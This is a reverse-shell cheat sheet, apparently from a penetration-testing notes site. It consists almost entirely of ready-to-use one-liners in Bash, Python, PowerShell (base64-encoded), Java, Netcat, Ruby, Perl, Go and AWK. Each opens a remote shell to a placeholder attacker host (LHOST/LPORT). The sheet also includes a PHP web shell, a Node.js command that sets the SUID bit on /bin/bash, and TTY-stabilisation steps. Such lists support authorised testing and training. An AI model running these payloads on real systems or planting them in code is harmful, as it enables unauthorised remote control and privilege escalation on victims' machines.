Reverse Shells

Stable TTY Shell

nc -lvnp
python -c 'import pty;pty.spawn("/bin/bash")'
^Z
stty raw -echo
fg
echo $TERM && tput lines && tput cols
export TERM=xterm-256color
stty rows <num> columns <cols>

rlwrap nc -lvnp 1234

Bash

Bash TCP

bash -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"

exec 5<>/dev/tcp/LHOST/LPORT && while read line 0<&5; do $line 2>&5 >&5; done

0<&196;exec 196<>/dev/tcp/LHOST/LPORT; sh <&196 >&196 2>&196

Bash UDP

nc -u -lvnp 1234

sh -i >& /dev/udp/127.0.0.1/1234 0>&1

Python

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("LHOST",1234)); os.dup2( s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

PowerShell

echo -n "$client = New-Object System.Net.Sockets.TCPClient('LHOST',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"| iconv -t utf-16le | base64 -w 0
powershell -enc <payload>

PHP

<?php system($_GET['cmd']); ?>

Java

r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/LHOST/LPORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor()

Node JS:

require('child_process').exec('bash -c "chmod u+s /bin/bash"')

Netcat

nc -e /bin/sh LHOST LPORT

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f

rm -f backpipe; mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc LHOST LPORT 1>/tmp/backpipe

Ruby

ruby -rsocket -e 'f=TCPSocket.open("LHOST",LPORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("LHOST","LPORT");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Windows specific:

ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Perl

perl -e 'use Socket;$i="LHOST";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Windows specific:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Golang

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","LHOST:LPORT");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

AWK

awk 'BEGIN {s = "/inet/tcp/0/LHOST/LPORT"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

PreviousHandy NextPivoting

Last updated 2 years ago

hashtagStable TTY Shell

hashtagBash

hashtagBash TCP

hashtagBash UDP

hashtagPython

hashtagPowerShell

hashtagPHP

hashtagJava

hashtagNetcat

hashtagRuby

hashtagPerl

hashtagGolang

hashtagAWK

Stable TTY Shell

Bash

Bash TCP

Bash UDP

Python

PowerShell

PHP

Java

Netcat

Ruby

Perl

Golang

AWK